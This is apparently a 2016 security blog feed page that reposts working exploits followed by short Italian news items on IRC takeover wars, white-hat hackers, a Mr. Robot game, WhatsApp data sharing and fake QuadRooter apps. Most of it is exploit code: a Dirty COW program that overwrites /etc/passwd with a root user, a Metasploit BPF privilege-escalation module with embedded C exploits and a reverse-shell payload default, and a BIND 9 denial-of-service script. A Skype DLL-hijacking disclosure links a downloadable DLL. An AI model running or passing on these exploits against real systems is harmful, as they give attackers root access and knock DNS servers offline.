MondoUnix Unix, Linux, FreeBSD, BSD, GNU, Kernel , RHEL, CentOS, Solaris, AIX, HP-UX, Mac OS X, Tru64, SCO UnixWare, Xenix, HOWTO, NETWORKING, IPV6

29Nov/160

Linux Kernel Dirty COW PTRACE_POKEDATA Privilege Escalation

//
// This exploit uses the pokemon exploit as a base and automatically
// generates a new passwd line. The original /etc/passwd is then
// backed up to /tmp/passwd.bak and overwritten with the new line.
// The user will be prompted for the new password when the binary is run.
// After running the exploit you should be able to login with the newly
// created user.
//
// Original exploit:
// https://github.com/dirtycow/dirtycow.github.io/blob/master/pokemon.c
//
// To use this exploit modify the user values according to your needs
//
// Compile with
//
// gcc -pthread dirty.c -o dirty -lcrypt
//
// and just run the newly create binary with ./dirty
//
// DON'T FORGET TO RESTORE YOUR /etc/passwd AFTER RUNNING THE EXPLOIT !
//
// Exploit adopted by Christian "FireFart" Mehlmauer
// https://firefart.at
//
 
 
#include <fcntl.h>
#include <pthread.h>
#include <string.h>
#include <stdio.h>
#include <stdint.h>
#include <sys/mman.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <sys/wait.h>
#include <sys/ptrace.h>
#include <stdlib.h>
#include <unistd.h>
#include <crypt.h>
 
const char *filename = "/etc/passwd";
const char *backup_filename = "/tmp/passwd.bak";
const char *salt = "firefart";
 
int f;
void *map;
pid_t pid;
pthread_t pth;
struct stat st;
 
struct Userinfo {
   char *username;
   char *hash;
   int user_id;
   int group_id;
   char *info;
   char *home_dir;
   char *shell;
};
 
char *generate_password_hash(char *plaintext_pw) {
  return crypt(plaintext_pw, salt);
}
 
char *generate_passwd_line(struct Userinfo u) {
  const char *format = "%s:%s:%d:%d:%s:%s:%s\n";
  int size = snprintf(NULL, 0, format, u.username, u.hash,
    u.user_id, u.group_id, u.info, u.home_dir, u.shell);
  char *ret = malloc(size + 1);
  sprintf(ret, format, u.username, u.hash, u.user_id,
    u.group_id, u.info, u.home_dir, u.shell);
  return ret;
}
 
void *madviseThread(void *arg) {
  int i, c = 0;
  for(i = 0; i < 200000000; i++) {
    c += madvise(map, 100, MADV_DONTNEED);
  }
  printf("madvise %d\n\n", c);
}
 
int copy_file(const char *from, const char *to) {
  // check if target file already exists
  if(access(to, F_OK) != -1) {
    printf("File %s already exists! Please delete it and run again\n",
      to);
    return -1;
  }
 
  char ch;
  FILE *source, *target;
 
  source = fopen(from, "r");
  if(source == NULL) {
    return -1;
  }
  target = fopen(to, "w");
  if(target == NULL) {
     fclose(source);
     return -1;
  }
 
  while((ch = fgetc(source)) != EOF) {
     fputc(ch, target);
   }
 
  printf("%s successfully backed up to %s\n",
    from, to);
 
  fclose(source);
  fclose(target);
 
  return 0;
}
 
int main(int argc, char *argv[])
{
  // backup file
  int ret = copy_file(filename, backup_filename);
  if (ret != 0) {
    exit(ret);
  }
 
  struct Userinfo user;
  // set values, change as needed
  user.username = "firefart";
  user.user_id = 0;
  user.group_id = 0;
  user.info = "pwned";
  user.home_dir = "/root";
  user.shell = "/bin/bash";
 
  char *plaintext_pw = getpass("Please enter new password: ");
  user.hash = generate_password_hash(plaintext_pw);
  char *complete_passwd_line = generate_passwd_line(user);
  printf("Complete line:\n%s\n", complete_passwd_line);
 
  f = open(filename, O_RDONLY);
  fstat(f, &st);
  map = mmap(NULL,
             st.st_size + sizeof(long),
             PROT_READ,
             MAP_PRIVATE,
             f,
             0);
  printf("mmap: %lx\n",(unsigned long)map);
  pid = fork();
  if(pid) {
    waitpid(pid, NULL, 0);
    int u, i, o, c = 0;
    int l=strlen(complete_passwd_line);
    for(i = 0; i < 10000/l; i++) {
      for(o = 0; o < l; o++) {
        for(u = 0; u < 10000; u++) {
          c += ptrace(PTRACE_POKETEXT,
                      pid,
                      map + o,
                      *((long*)(complete_passwd_line + o)));
        }
      }
    }
    printf("ptrace %d\n",c);
  }
  else {
    pthread_create(&pth,
                   NULL,
                   madviseThread,
                   NULL);
    ptrace(PTRACE_TRACEME);
    kill(getpid(), SIGSTOP);
    pthread_join(pth,NULL);
  }
 
  printf("Done! Check %s to see if the new user was created\n", filename);
  printf("You can log in with username %s and password %s.\n\n",
    user.username, plaintext_pw);
  printf("\nDON'T FORGET TO RESTORE %s FROM %s !!!\n\n",
    filename, backup_filename);
  return 0;
}

(96)

15Nov/160

Linux BPF Local Privilege Escalation

 
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
 
require 'msf/core'
 
class MetasploitModule < Msf::Exploit::Local
  Rank = GoodRanking
 
  include Msf::Exploit::EXE
  include Msf::Post::File
  include Msf::Exploit::FileDropper
 
  def initialize(info={})
    super( update_info( info, {
        'Name'          => 'Linux BPF Local Privilege Escalation',
        'Description'   => %q{
          Linux kernel >=4.4 with CONFIG_BPF_SYSCALL and kernel.unprivileged_bpf_disabled
          sysctl is not set to 1, BPF can be abused to priv escalate.
          Ubuntu 16.04 has all of these conditions met.
        },
        'License'       => MSF_LICENSE,
        'Author'        =>
          [
            'jannh@google.com',                    # discovery
            'h00die <mike@shorebreaksecurity.com>' # metasploit module
          ],
        'Platform'      => [ 'linux' ],
        'Arch'          => [ ARCH_X86, ARCH_X86_64 ],
        'SessionTypes'  => [ 'shell', 'meterpreter' ],
        'References'    =>
          [
            [ 'CVE', '2016-4557' ],
            [ 'EDB', '39772' ],
            [ 'URL', 'https://bugs.chromium.org/p/project-zero/issues/detail?id=808' ],
            [ 'URL', 'https://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=8358b02bf67d3a5d8a825070e1aa73f25fb2e4c7' ]
          ],
        'Targets'       =>
          [
            [ 'Linux x86',       { 'Arch' => ARCH_X86 } ],
            [ 'Linux x64',       { 'Arch' => ARCH_X86_64 } ]
          ],
        'DefaultOptions' =>
          {
            'payload' => 'linux/x64/mettle/reverse_tcp',
            'PrependFork' => true,
            'WfsDelay' => 60 # we can chew up a lot of CPU for this, so we want to give time for payload to come through
            },
        'DefaultTarget' => 1,
        'DisclosureDate' => 'May 04 2016',
        'Privileged'     => true
      }
      ))
    register_options([
        OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ]),
        OptEnum.new('COMPILE', [ true, 'Compile on target', 'Auto', ['Auto', 'True', 'False']]),
        OptInt.new('MAXWAIT', [ true, 'Max seconds to wait for decrementation in seconds', 120 ])
      ], self.class)
  end
 
  def check
    def check_config_bpf_syscall?()
      output = cmd_exec('grep CONFIG_BPF_SYSCALL /boot/config-`uname -r`')
      if output == 'CONFIG_BPF_SYSCALL=y'
        vprint_good('CONFIG_BPF_SYSCALL is set to yes')
        return true
      else
        print_error('CONFIG_BPF_SYSCALL is NOT set to yes')
        return false
      end
    end
 
    def check_kernel_disabled?()
      output = cmd_exec('sysctl kernel.unprivileged_bpf_disabled')
      if output != 'kernel.unprivileged_bpf_disabled = 1'
        vprint_good('kernel.unprivileged_bpf_disabled is NOT set to 1')
        return true
      else
        print_error('kernel.unprivileged_bpf_disabled is set to 1')
        return false
      end
    end
 
    def check_fuse?()
      lib = cmd_exec('dpkg --get-selections | grep ^fuse')
      if lib.include?('install')
        vprint_good('fuse is installed')
        return true
      else
        print_error('fuse is not installed.  Exploitation will fail.')
        return false
      end
    end
 
    def mount_point_exists?()
      if directory?('/tmp/fuse_mount')
        print_error('/tmp/fuse_mount should be unmounted and deleted.  Exploitation will fail.')
        return false
      else
        vprint_good('/tmp/fuse_mount doesn\'t exist')
        return true
      end
    end
 
    if check_config_bpf_syscall?() && check_kernel_disabled?() && check_fuse?() && mount_point_exists?()
      CheckCode::Appears
    else
      CheckCode::Safe
    end
  end
 
  def exploit
 
    def upload_and_compile(filename, file_path, file_content, compile=nil)
      rm_f "#{file_path}"
      if not compile.nil?
        rm_f "#{file_path}.c"
        vprint_status("Writing #{filename} to #{file_path}.c")
        write_file("#{file_path}.c", file_content)
        register_file_for_cleanup("#{file_path}.c")
        output = cmd_exec(compile)
        if output != ''
          print_error(output)
          fail_with(Failure::Unknown, "#{filename} at #{file_path}.c failed to compile")
        end
      else
        vprint_status("Writing #{filename} to #{file_path}")
        write_file(file_path, file_content)
      end
      cmd_exec("chmod +x #{file_path}");
      register_file_for_cleanup(file_path)
    end
 
    doubleput = %q{
      #define _GNU_SOURCE
      #include <stdbool.h>
      #include <errno.h>
      #include <err.h>
      #include <unistd.h>
      #include <fcntl.h>
      #include <sched.h>
      #include <signal.h>
      #include <stdlib.h>
      #include <stdio.h>
      #include <string.h>
      #include <sys/types.h>
      #include <sys/stat.h>
      #include <sys/syscall.h>
      #include <sys/prctl.h>
      #include <sys/uio.h>
      #include <sys/mman.h>
      #include <sys/wait.h>
      #include <linux/bpf.h>
      #include <linux/kcmp.h>
 
      #ifndef __NR_bpf
      # if defined(__i386__)
      #  define __NR_bpf 357
      # elif defined(__x86_64__)
      #  define __NR_bpf 321
      # elif defined(__aarch64__)
      #  define __NR_bpf 280
      # else
      #  error
      # endif
      #endif
 
      int uaf_fd;
 
      int task_b(void *p) {
        /* step 2: start writev with slow IOV, raising the refcount to 2 */
        char *cwd = get_current_dir_name();
        char data[2048];
        sprintf(data, "* * * * * root /bin/chown root:root '%s'/suidhelper; /bin/chmod 06755 '%s'/suidhelper\n#", cwd, cwd);
        struct iovec iov = { .iov_base = data, .iov_len = strlen(data) };
        if (system("fusermount -u /home/user/ebpf_mapfd_doubleput/fuse_mount 2>/dev/null; mkdir -p fuse_mount && ./hello ./fuse_mount"))
          errx(1, "system() failed");
        int fuse_fd = open("fuse_mount/hello", O_RDWR);
        if (fuse_fd == -1)
          err(1, "unable to open FUSE fd");
        if (write(fuse_fd, &iov, sizeof(iov)) != sizeof(iov))
          errx(1, "unable to write to FUSE fd");
        struct iovec *iov_ = mmap(NULL, sizeof(iov), PROT_READ, MAP_SHARED, fuse_fd, 0);
        if (iov_ == MAP_FAILED)
          err(1, "unable to mmap FUSE fd");
        fputs("starting writev\n", stderr);
        ssize_t writev_res = writev(uaf_fd, iov_, 1);
        /* ... and starting inside the previous line, also step 6: continue writev with slow IOV */
        if (writev_res == -1)
          err(1, "writev failed");
        if (writev_res != strlen(data))
          errx(1, "writev returned %d", (int)writev_res);
        fputs("writev returned successfully. if this worked, you'll have a root shell in <=60 seconds.\n", stderr);
        while (1) sleep(1); /* whatever, just don't crash */
      }
 
      void make_setuid(void) {
        /* step 1: open writable UAF fd */
        uaf_fd = open("/dev/null", O_WRONLY|O_CLOEXEC);
        if (uaf_fd == -1)
          err(1, "unable to open UAF fd");
        /* refcount is now 1 */
 
        char child_stack[20000];
        int child = clone(task_b, child_stack + sizeof(child_stack), CLONE_FILES | SIGCHLD, NULL);
        if (child == -1)
          err(1, "clone");
        sleep(3);
        /* refcount is now 2 */
 
        /* step 2+3: use BPF to remove two references */
        for (int i=0; i<2; i++) {
          struct bpf_insn insns[2] = {
            {
              .code = BPF_LD | BPF_IMM | BPF_DW,
              .src_reg = BPF_PSEUDO_MAP_FD,
              .imm = uaf_fd
            },
            {
            }
          };
          union bpf_attr attr = {
            .prog_type = BPF_PROG_TYPE_SOCKET_FILTER,
            .insn_cnt = 2,
            .insns = (__aligned_u64) insns,
            .license = (__aligned_u64)""
          };
          if (syscall(__NR_bpf, BPF_PROG_LOAD, &attr, sizeof(attr)) != -1)
            errx(1, "expected BPF_PROG_LOAD to fail, but it didn't");
          if (errno != EINVAL)
            err(1, "expected BPF_PROG_LOAD to fail with -EINVAL, got different error");
        }
        /* refcount is now 0, the file is freed soon-ish */
 
        /* step 5: open a bunch of readonly file descriptors to the target file until we hit the same pointer */
        int status;
        int hostnamefds[1000];
        int used_fds = 0;
        bool up = true;
        while (1) {
          if (waitpid(child, &status, WNOHANG) == child)
            errx(1, "child quit before we got a good file*");
          if (up) {
            hostnamefds[used_fds] = open("/etc/crontab", O_RDONLY);
            if (hostnamefds[used_fds] == -1)
              err(1, "open target file");
            if (syscall(__NR_kcmp, getpid(), getpid(), KCMP_FILE, uaf_fd, hostnamefds[used_fds]) == 0) break;
            used_fds++;
            if (used_fds == 1000) up = false;
          } else {
            close(hostnamefds[--used_fds]);
            if (used_fds == 0) up = true;
          }
        }
        fputs("woohoo, got pointer reuse\n", stderr);
        while (1) sleep(1); /* whatever, just don't crash */
      }
 
      int main(void) {
        pid_t child = fork();
        if (child == -1)
          err(1, "fork");
        if (child == 0)
          make_setuid();
        struct stat helperstat;
        while (1) {
          if (stat("suidhelper", &helperstat))
            err(1, "stat suidhelper");
          if (helperstat.st_mode & S_ISUID)
            break;
          sleep(1);
        }
        fputs("suid file detected, launching rootshell...\n", stderr);
        execl("./suidhelper", "suidhelper", NULL);
        err(1, "execl suidhelper");
      }
    }
 
    suid_helper = %q{
      #include <unistd.h>
      #include <err.h>
      #include <stdio.h>
      #include <sys/types.h>
 
      int main(void) {
        if (setuid(0) || setgid(0))
          err(1, "setuid/setgid");
        fputs("we have root privs now...\n", stderr);
        execl("/bin/bash", "bash", NULL);
        err(1, "execl");
      }
 
    }
 
    hello = %q{
      /*
        FUSE: Filesystem in Userspace
        Copyright (C) 2001-2007  Miklos Szeredi <miklos@szeredi.hu>
        heavily modified by Jann Horn <jannh@google.com>
 
        This program can be distributed under the terms of the GNU GPL.
        See the file COPYING.
 
        gcc -Wall hello.c `pkg-config fuse --cflags --libs` -o hello
      */
 
      #define FUSE_USE_VERSION 26
 
      #include <fuse.h>
      #include <stdio.h>
      #include <string.h>
      #include <errno.h>
      #include <fcntl.h>
      #include <unistd.h>
      #include <err.h>
      #include <sys/uio.h>
 
      static const char *hello_path = "/hello";
 
      static char data_state[sizeof(struct iovec)];
 
      static int hello_getattr(const char *path, struct stat *stbuf)
      {
        int res = 0;
        memset(stbuf, 0, sizeof(struct stat));
        if (strcmp(path, "/") == 0) {
          stbuf->st_mode = S_IFDIR | 0755;
          stbuf->st_nlink = 2;
        } else if (strcmp(path, hello_path) == 0) {
          stbuf->st_mode = S_IFREG | 0666;
          stbuf->st_nlink = 1;
          stbuf->st_size = sizeof(data_state);
          stbuf->st_blocks = 0;
        } else
          res = -ENOENT;
        return res;
      }
 
      static int hello_readdir(const char *path, void *buf, fuse_fill_dir_t filler, off_t offset, struct fuse_file_info *fi) {
        filler(buf, ".", NULL, 0);
        filler(buf, "..", NULL, 0);
        filler(buf, hello_path + 1, NULL, 0);
        return 0;
      }
 
      static int hello_open(const char *path, struct fuse_file_info *fi) {
        return 0;
      }
 
      static int hello_read(const char *path, char *buf, size_t size, off_t offset, struct fuse_file_info *fi) {
        sleep(10);
        size_t len = sizeof(data_state);
        if (offset < len) {
          if (offset + size > len)
            size = len - offset;
          memcpy(buf, data_state + offset, size);
        } else
          size = 0;
        return size;
      }
 
      static int hello_write(const char *path, const char *buf, size_t size, off_t offset, struct fuse_file_info *fi) {
        if (offset != 0)
          errx(1, "got write with nonzero offset");
        if (size != sizeof(data_state))
          errx(1, "got write with size %d", (int)size);
        memcpy(data_state + offset, buf, size);
        return size;
      }
 
      static struct fuse_operations hello_oper = {
        .getattr  = hello_getattr,
        .readdir  = hello_readdir,
        .open    = hello_open,
        .read    = hello_read,
        .write    = hello_write,
      };
 
      int main(int argc, char *argv[]) {
        return fuse_main(argc, argv, &hello_oper, NULL);
      }
    }
 
    hello_filename = 'hello'
    hello_path = "#{datastore['WritableDir']}/#{hello_filename}"
    doubleput_file = "#{datastore['WritableDir']}/doubleput"
    suidhelper_filename = 'suidhelper'
    suidhelper_path = "#{datastore['WritableDir']}/#{suidhelper_filename}"
    payload_filename = rand_text_alpha(8)
    payload_path = "#{datastore['WritableDir']}/#{payload_filename}"
 
    if check != CheckCode::Appears
      fail_with(Failure::NotVulnerable, 'Target not vulnerable! punt!')
    end
 
    def has_prereqs?()
      def check_libfuse_dev?()
        lib = cmd_exec('dpkg --get-selections | grep libfuse-dev')
        if lib.include?('install')
          vprint_good('libfuse-dev is installed')
          return true
        else
          print_error('libfuse-dev is not installed.  Compiling will fail.')
          return false
        end
      end
      def check_gcc?()
        gcc = cmd_exec('which gcc')
        if gcc.include?('gcc')
          vprint_good('gcc is installed')
          return true
        else
          print_error('gcc is not installed.  Compiling will fail.')
          return false
        end
      end
      def check_pkgconfig?()
        lib = cmd_exec('dpkg --get-selections | grep ^pkg-config')
        if lib.include?('install')
          vprint_good('pkg-config is installed')
          return true
        else
          print_error('pkg-config is not installed.  Exploitation will fail.')
          return false
        end
      end
      return check_libfuse_dev?() && check_gcc?() && check_pkgconfig?()
    end
 
    compile = false
    if datastore['COMPILE'] == 'Auto' || datastore['COMPILE'] == 'True'
      if has_prereqs?()
        compile = true
        vprint_status('Live compiling exploit on system')
      else
        vprint_status('Dropping pre-compiled exploit on system')
      end
    end
 
    if compile == false
      # doubleput file
      path = ::File.join( Msf::Config.data_directory, 'exploits', 'CVE-2016-4557', 'doubleput')
      fd = ::File.open( path, "rb")
      doubleput = fd.read(fd.stat.size)
      fd.close
      # hello file
      path = ::File.join( Msf::Config.data_directory, 'exploits', 'CVE-2016-4557', 'hello')
      fd = ::File.open( path, "rb")
      hello = fd.read(fd.stat.size)
      fd.close
      # suidhelper file
      path = ::File.join( Msf::Config.data_directory, 'exploits', 'CVE-2016-4557', 'suidhelper')
      fd = ::File.open( path, "rb")
      suid_helper = fd.read(fd.stat.size)
      fd.close
 
      # overwrite with the hardcoded variable names in the compiled versions
      payload_filename = 'AyDJSaMM'
      payload_path = '/tmp/AyDJSaMM'
    end
 
    # make our substitutions so things are dynamic
    suid_helper.gsub!(/execl\("\/bin\/bash", "bash", NULL\);/,
               "return execl(\"#{payload_path}\", \"\", NULL);") #launch our payload, and do it in a return to not freeze the executable
    doubleput.gsub!(/execl\(".\/suidhelper", "suidhelper", NULL\);/,
                'exit(0);')
    print_status('Writing files to target')
    cmd_exec("cd #{datastore['WritableDir']}")
    upload_and_compile('hello', hello_path, hello, compile ? "gcc -o #{hello_filename} #{hello_filename}.c -Wall -std=gnu99 `pkg-config fuse --cflags --libs`" : nil)
    upload_and_compile('doubleput', doubleput_file, doubleput, compile ? "gcc -o #{doubleput_file} #{doubleput_file}.c -Wall" : nil)
    upload_and_compile('suidhelper', suidhelper_path, suid_helper, compile ? "gcc -o #{suidhelper_filename} #{suidhelper_filename}.c -Wall" : nil)
    upload_and_compile('payload', payload_path, generate_payload_exe)
 
    print_status('Starting execution of priv esc.  This may take about 120 seconds')
 
    cmd_exec(doubleput_file)
    sec_waited = 0
    until sec_waited > datastore['MAXWAIT'] do
      Rex.sleep(1)
      # check file permissions
      if cmd_exec("ls -lah #{suidhelper_path}").include?('-rwsr-sr-x 1 root root')
        print_good('got root, starting payload')
        print_error('This exploit may require process killing of \'hello\', and \'doubleput\' on the target')
        print_error('This exploit may require manual umounting of /tmp/fuse_mount via \'fusermount -z -u /tmp/fuse_mount\' on the target')
        print_error('This exploit may require manual deletion of /tmp/fuse_mount via \'rm -rf /tmp/fuse_mount\' on the target')
        cmd_exec("#{suidhelper_path}")
        return
      end
      sec_waited +=1
    end
  end
 
  def on_new_session(session)
    # if we don't /bin/bash here, our payload times out
    # [*] Meterpreter session 2 opened (192.168.199.131:4444 -> 192.168.199.130:37022) at 2016-09-27 14:15:04 -0400
    # [*] 192.168.199.130 - Meterpreter session 2 closed.  Reason: Died
    session.shell_command_token('/bin/bash')
    super
  end
end

(92)

6Oct/160

BIND 9 DNS Server Denial Of Service

import socket
import struct
 
TARGET = ('192.168.200.10', 53)
 
Q_A = 1
Q_TSIG = 250
DNS_MESSAGE_HEADERLEN = 12
 
 
def build_bind_nuke(question="\x06google\x03com\x00", udpsize=512):
    query_A = "\x8f\x65\x00\x00\x00\x01\x00\x00\x00\x00\x00\x01" + question + int16(Q_A) + "\x00\x01"
 
    sweet_spot = udpsize - DNS_MESSAGE_HEADERLEN + 1
    tsig_rr = build_tsig_rr(sweet_spot)
 
    return query_A + tsig_rr
 
def int16(n):
    return struct.pack("!H", n)
 
def build_tsig_rr(bind_demarshalled_size):
    signature_data = ("\x00\x00\x57\xeb\x80\x14\x01\x2c\x00\x10\xd2\x2b\x32\x13\xb0\x09"
                      "\x46\x34\x21\x39\x58\x62\xf3\xd5\x9c\x8b\x8f\x65\x00\x00\x00\x00")
    tsig_rr_extra_fields = "\x00\xff\x00\x00\x00\x00"
 
    necessary_bytes  = len(signature_data) + len(tsig_rr_extra_fields)
    necessary_bytes += 2 + 2 # length fields
 
    # from sizeof(TSIG RR) bytes conforming the TSIG RR
    # bind9 uses sizeof(TSIG RR) - 16 to build its own
    sign_name, algo_name = generate_padding(bind_demarshalled_size - necessary_bytes + 16)
 
    tsig_hdr = sign_name + int16(Q_TSIG) + tsig_rr_extra_fields
    tsig_data = algo_name + signature_data
    return tsig_hdr + int16(len(tsig_data)) + tsig_data
 
def generate_padding(n):
    max_per_bucket = [0x3f, 0x3f, 0x3f, 0x3d, 0x3f, 0x3f, 0x3f, 0x3d]
    buckets = [1] * len(max_per_bucket)
 
    min_size = len(buckets) * 2 + 2 # 2 bytes for every bucket plus each null byte
    max_size = sum(max_per_bucket) + len(buckets) + 2
 
    if not(min_size <= n <= max_size):
        raise RuntimeException("unsupported amount of bytes")
 
    curr_idx, n = 0, n - min_size
    while n > 0:
        next_n = max(n - (max_per_bucket[curr_idx] - 1), 0)
        buckets[curr_idx] = 1 + n - next_n
        n, curr_idx = next_n, curr_idx + 1
 
    n_padding = lambda amount: chr(amount) + "A" * amount
    stringify = lambda sizes: "".join(map(n_padding, sizes)) + "\x00"
 
    return stringify(buckets[:4]), stringify(buckets[4:])
 
if __name__ == "__main__":
    bombita = build_bind_nuke()
 
    s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    s.sendto(bombita, TARGET)
    s.close()

(242)

28Sep/160

Skype DLL Hijacking

Hi,

There are a dll planting vuln in skype installer. This vuln had been reported to Microsoft but they decided not fix this.

Here is the vulnerability details:
------
Skype installer in Windows is open to DLL hijacking.

Skype looks for a specific DLL by dynamically going through a set of predefined directories. One of the directory being scanned is the installation directory, and this is exactly what is abused in this
vulnerability.

Reproduce Notes:
1. Download this dll https://mega.nz/#!b4ViSLJL!Pv99pN2d_WxsUHGPH0Ej3onwVeSdh41mpyKfQJfAq8E
2. Copy msi.dll to Downloads directory
3. download skype installer
4. execute the downloaded installer from your "Downloads" directory; Observed behavior: message box ahyhya

Another dll can be used to hijack: dpapi.dll cryptui.dll
------

Regards,
Tien
--
Tien Phan
Blog : http://tienpp.blogspot.com
twitter : @_razybo_ (200)

28Sep/160

IRC War

La IRC War era uno scontro su IRC, in particolare su IRCnet, che veniva combattuto dalle varie Crew (gruppo di utenti con interessi e passioni comuni) allo scopo di conquistare il maggior numero di canali e di ottenere il rispetto da parte delle altre Crew. È ormai scomparsa per via della chiusura di vari server e del fallimento di IRC, per via di Messenger Hotmail e dei numerosi social network sorti.

La conquista dei canali avveniva tramite il TakeOver, dove l'operatore (@OP) veniva spodestato del suo potere. Le tecniche più utilizzate durante un TakeOver erano:

Impiego di Fake: utenti che utilizzavano gli stessi dati di un operatore per ottenere la carica di @OP. Veniva spesso impiegata la tecnica del DDoS per mandare in Ping Timeout la vittima e rubare così i suoi dati.

I dati rubati consistevano in Nick, Email, Ident, Description e spesso venivano impiegati dei Pipe o dei Proxy per utilizzare un host o un ip simile a quello della vittima.

Utilizzo di cloni: i più utilizzati erano gli Psotnic o i famosi X-Men. Entrambe noti per la loro velocità.

Bug degli irc server. Effettuando un DDos verso un irc server e scollegandolo quindi dalla rete si creava una sorta di rete parallela separata (Split). I server ad esso collegati venivano quindi a trovarsi con canali sprovvisti di utenti per cui il server assegnava in automatico l'OP al primo utente che vi entrava. Terminato il DDos lo split terminava ed i server univano le informazioni, fornendo quindi l'op all'utente fittizio del server separato. Di solito il Takeover avveniva grazie a dei cloni che prontamente al termine dello split andavano a togliere l'OP ai proprietari.

Dopo parecchi anni i gestori degli IRC Server per mitigare il problema hanno adottato delle contromisure per impedire questo tipo di attacco ed evitare quindi i DDos.

Fonte: wikipedia
(135)

16Sep/160

ethical hacher

Un white hat (letteralmente "cappello bianco"), chiamato anche hacker etico, è un hacker che si oppone all'abuso dei sistemi informatici.
La sua attività è di verifica coordinata e complessiva della sicurezza di una retee dei sistemi che la compongono, al fine di delineare il livello effettivo di rischio cui sono esposti i dati, e proporre eventuali azioni correttive per migliorare il grado di sicurezza.

Si contrappongono ai black hat in quanto hanno finalità positive e altruistiche.

Fonte: Wikipedia
(216)

29Aug/160

Mr. Robot, la serie tv diventa un videogame

Mr. Robot la serie tv diventa un videogame

Per una serie tv così legata al mondo degli hacker e dell’informatica, l’arrivo di un videogioco era praticamente obbligatorio.
Ecco allora che dalla Gamescom, l’annuale fiera di Colonia dedicata al mondo videoludico, è arrivato l’annuncio ufficiale di Mr. Robot 1.51exfiltrati0n, un’app per Android e iOS che pesca a piene mani dall’universo dello show con Rami Malek e Christian Slater.

Il gioco, pubblicato da Telltale Games, riproduce in maniera fedele un’app di messaggistica istantanea sviluppata dalla Evil Corp., la multinazionale che nella serie tv rappresenta l’antagonista del gruppo di hacker fsociety, guidati proprio dal misterioso Mr. Robot.
Tra chat, scambi di file e informazioni segrete, i giocatori potranno dialogare con i personaggi della serie e scegliere di contribuire alla caduta della Evil.
Oppure mettere i bastoni tra le ruote agli hacker, facendo in piena libertà le proprie scelte: al centro della storia, infatti, c’è sempre il giocatore.

Mr.Robot 1.51exfiltration è già disponibile a circa 3,30 euro sia su smartphone Android che dispositivi iOS.
Per ricevere aggiornamenti sul gioco invece, basta seguire l’account twitter ufficiale @ecorpmessaging.

Fonte: http://www.lastampa.it/2016/08/17/tecnologia/giochi/mr-robot-la-serie-tv-diventa-un-videogame-q58kQJttVFQVGxkdwBHiEO/pagina.html

(250)

29Aug/160

Come evitare che Facebook usi i nostri dati di WhatsApp

whatsapp facebook

WhatsApp e Facebook sono e rimarranno due applicazioni separate sul nostro smartphone. Ma l’aggiornamento dei termini e dell’informativa sulla privacy dell’iconcina di messaggistica (comunicato qui) le avvicina molto. E porta le imprese all’interno delle chat. Il colosso di Mark Zuckerberg ha acquistato WhatsApp nel febbraio del 2014 con la promessa da ambo le parti di non mischiare servizi e dati, soprattutto in considerazione del fatto che il social network si basa sulla vendita di pubblicità mentre l’app verde è priva di annunci.
Adesso qualcosa è cambiato: una serie di informazioni relative a WhatsApp, come il nostro numero di telefono o gli accessi alle finestre di dialogo, verranno condivise con Facebook e con il resto del gruppo di Menlo Park. Instagram o Oculus, ad esempio. Come l’iconcina fondata da Jan Koum ha tenuto a sottolineare, non vengono coinvolti i contenuti degli scambi: la crittografia end to end introdotta in aprile impedisce a chiunque di vedere testi o fotografie in transito da un dispositivo all’altro.

Concretamente cosa vuol dire e cosa cambia per noi? Il social network da 1,7 miliardi di utenti potrà attingere (anche) a questi dati per inviarci messaggi pubblicitari sempre più mirati quando navighiamo sulla sua piattaforma o per consigliarci potenziali amici da aggiungere alla nostra cerchia. Potrà capitare di vedere fra i suggerimenti di Facebook il nome e il volto di una persona con cui si è appena entrati in contatto su WhatsApp. O di imbatterci sul social network nella pubblicità di un’azienda che conosce il nostro numero di telefono.

Non solo, anche l’applicazione di messaggistica da più un miliardo di utenti si sta per aprire direttamente alle imprese. L’intenzione non è di ospitare messaggi pubblicitari classici ma di consentire, ad esempio, alla banca di avvisarci di eventuali movimenti strani sul nostro conto, alla compagnia aerea di tenerci aggiornati sul ritardo del volo che stiamo per prendere o alla pizzeria di comunicarci che il pasto ordinato sta per arrivare. La novità verrà testata nei prossimi mesi, ed era stata annunciata a inizio anno, e sembra propendere per la creazione di chat ufficiali cui potremo decidere o meno di aderire - ma che saranno anche sfruttate per inviarci consigli su prodotti o servizi da acquistare in base alle nostre preferenze - e non dovrebbero interromperci durante le chiacchierate canoniche.

...

Fonte: http://www.corriere.it/tecnologia/social/16_agosto_26/come-evitare-che-whatsapp-condivida-dati-facebokk-bdd8fbea-6ba7-11e6-8bdd-2a860cc068c8.shtml
(195)

26Aug/160

Dropbox email warns users that old passwords must be reset

http://www.theinquirer.net/inquirer/news/2469065/dropbox-email-warns-users-that-old-passwords-must-be-reset (370)

24Aug/160

Malicious QuadRooter Apps Discovered in Google Play Store

Malicious QuadRooter Apps Discovered in Google Play Store

The recent disclosure of a set of vulnerabilities in the Android operating system that could potentially put over 900 million devices at risk may have been patched, but its threat remains.

The QuadRooter flaw, discovered by Check Point, could potentially give cyber attackers complete control over an Android device. The vulnerability was discovered in Qualcomm chips, which are used in smartphones and tablets made by Blackberry, LG, Google and more. This put up to 900 million devices at risk. The flaw was dubbed QuadRooter because there are four interconnected flaws which can be used to gain access to the “root” of the phone, the Guardian said.

Patches to fix the flaw were made available quickly, and Check Point released an app called QuadRooter Scanner on the Google Play store which checked whether a device was at risk.

However, new research has revealed that QuadRooter’s threat is still alive. Researchers at RiskIQ have found a number of malicious apps available for download on various app stores that claim to offer a fix for the flaw, but of course do nothing of the sort.

One of these, called Fix Patch QuadRooter by KiwiApps Ltd was found in the official Google Play store. Although it was removed from there it popped up in a number of unofficial app stores, along with a number of others. In total, 27 malicious apps related to QuadRooter have so far been found.

These have been found available for download in the official Google Play store, as well as others such as BingAPK, SameAPK, AppBrain, and AppChina. All these unofficial sources carry big risks to users and their devices.

These unofficial, third-party app stores are a dangerous place; a lack of quality control means many applications are malicious, containing malware that can steal personal data. While these app stores may seem convenient for users, especially in countries where official apps may not be available, users should stick with the official Google Play Store wherever possible.

Photo © ymgerman/Shutterstock.com

Fonte: http://www.infosecurity-magazine.com/news/malicious-quadrooter-apps/

(321)